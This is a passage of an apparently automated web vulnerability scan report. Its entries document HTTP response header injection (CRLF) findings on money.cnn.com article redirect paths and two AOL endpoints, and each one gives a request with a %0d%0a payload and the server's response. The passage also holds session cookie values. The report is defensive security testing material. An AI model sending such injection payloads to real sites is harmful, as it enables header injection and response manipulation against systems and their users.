The value of REST URL parameter 5 is copied into the Location response header. The payload f9e29%0d%0a96eb2cc6b99 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/f9e29%0d%0a96eb2cc6b99/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/f9e29
96eb2cc6b99/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/f9e29
96eb2cc6
...[SNIP]...

4.55. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload cec6e%0d%0a52d76717a7c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/autos/cec6e%0d%0a52d76717a7c/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/autos/cec6e
52d76717a7c/index.htm
Vary: Accept-Encoding
Content-Length: 313
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/autos/cec6e
52
...[SNIP]...

4.56. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload fd42d%0d%0a71f9eeb8f02 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/autos/cruz_recall/fd42d%0d%0a71f9eeb8f02 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/autos/cruz_recall/fd42d
71f9eeb8f02
Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/autos/cruz_reca
...[SNIP]...

4.57. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 93492%0d%0ae298c488f49 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/93492%0d%0ae298c488f49/05/04/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/93492
e298c488f49/05/04/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/93492
e298c488f49/05/04/m
...[SNIP]...

4.58. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 9b7de%0d%0af142d288158 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/9b7de%0d%0af142d288158/04/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/9b7de
f142d288158/04/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/9b7de
f142d288158/04
...[SNIP]...

4.59. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 28f2d%0d%0ae137b1948d1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/28f2d%0d%0ae137b1948d1/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/28f2d
e137b1948d1/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/28f2d
e137b1948d1
...[SNIP]...

4.60. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 624dd%0d%0a7a44fd8182c was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/624dd%0d%0a7a44fd8182c/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/624dd
7a44fd8182c/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/624dd
7a44fd81
...[SNIP]...

4.61. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 73d8b%0d%0ac2cadca0a5d was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/markets/73d8b%0d%0ac2cadca0a5d/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/markets/73d8b
c2cadca0a5d/index.htm
Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/markets/73d8b

...[SNIP]...

4.62. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 98825%0d%0a614e4316de0 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/markets/markets_newyork/98825%0d%0a614e4316de0 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/markets/markets_newyork/98825
614e4316de0
Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/markets/markets
...[SNIP]...

4.63. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 404f3%0d%0a9396d192c48 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/404f3%0d%0a9396d192c48/05/04/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/404f3
9396d192c48/05/04/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/404f3
9396d192c48/05/04/n
...[SNIP]...

4.64. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 55fd8%0d%0a5f142f61b3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/55fd8%0d%0a5f142f61b3/04/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/55fd8
5f142f61b3/04/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/55fd8
5f142f61b3/04/
...[SNIP]...

4.65. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload c9ced%0d%0a3f30ec8af45 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/c9ced%0d%0a3f30ec8af45/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/c9ced
3f30ec8af45/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/c9ced
3f30ec8af45
...[SNIP]...

4.66. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d83ab%0d%0a0af0d3835a2 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/d83ab%0d%0a0af0d3835a2/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/d83ab
0af0d3835a2/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/d83ab
0af0d383
...[SNIP]...

4.67. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload bbae8%0d%0ad95d85a0b19 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/bbae8%0d%0ad95d85a0b19/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/bbae8
d95d85a0b19/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/bbae8
d95
...[SNIP]...

4.68. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 63293%0d%0a77800aa245f was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/companies/63293%0d%0a77800aa245f/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/companies/63293
77800aa245f/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/companies/
...[SNIP]...

4.69. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 9c496%0d%0a6d08e5ce5cb was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/companies/exxon_oil_taxes/9c496%0d%0a6d08e5ce5cb HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:48 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/companies/exxon_oil_taxes/9c496
6d08e5ce5cb
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/companies/
...[SNIP]...

4.70. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c6fb1%0d%0aa5f49d9e87c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/c6fb1%0d%0aa5f49d9e87c/05/04/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/c6fb1
a5f49d9e87c/05/04/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/c6fb1
a5f49d9e87c/05/04/p
...[SNIP]...

4.71. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 75104%0d%0a0f14aac6d68 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/75104%0d%0a0f14aac6d68/04/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/75104
0f14aac6d68/04/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/75104
0f14aac6d68/04
...[SNIP]...

4.72. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload da453%0d%0a7f4a946b499 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/da453%0d%0a7f4a946b499/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/da453
7f4a946b499/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/da453
7f4a946b499
...[SNIP]...

4.73. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload e1cf0%0d%0a723d722c4db was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/e1cf0%0d%0a723d722c4db/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/e1cf0
723d722c4db/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/e1cf0
723d722c
...[SNIP]...

4.74. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 66a8e%0d%0a13db8c51deb was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/pf/66a8e%0d%0a13db8c51deb/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/pf/66a8e
13db8c51deb/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/pf/66a8e
13db8
...[SNIP]...

4.75. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 11290%0d%0a85aae76790b was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/pf/banks_interchange_fees/11290%0d%0a85aae76790b HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/pf/banks_interchange_fees/11290
85aae76790b
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/pf/banks_interc
...[SNIP]...

4.76. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.screenname.aol.com
Path:	/_cqr/login/login.psp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 64dc2%0d%0a487ff0957ca was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3amail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aANGELIA%7csnt%3aScreenName%7csid%3acd9cb681-98fa-4a1a-8ffc-ecae8646b29d&offerId=newmail-en-us-v2&seamless=novl&64dc2%0d%0a487ff0957ca=1 HTTP/1.1
Host: my.screenname.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575010062-Repeat%7C1367647010062%3B%20s_nrgvo%3DRepeat%7C1367647010064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 00:57:52 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://my.screenname.aol.com/_cqr/login/login.psp?64dc2
487ff0957ca=1&sitedomain=sns.webmail.aol.com&lang=en&seamless=novl&offerId=newmail-en-us-v2&authLev=0&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Amail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AANGELIA%7Csnt%3AScreenName%7Csid%3Acd9cb681-98fa-4a1a-8ffc-ecae8646b29d&locale=us
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"

4.77. http://search.aol.com/aol/tracking [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.aol.com
Path:	/aol/tracking

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 619d2%0d%0a09d9070d268 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /aol/tracking?619d2%0d%0a09d9070d268=1 HTTP/1.1
Host: search.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
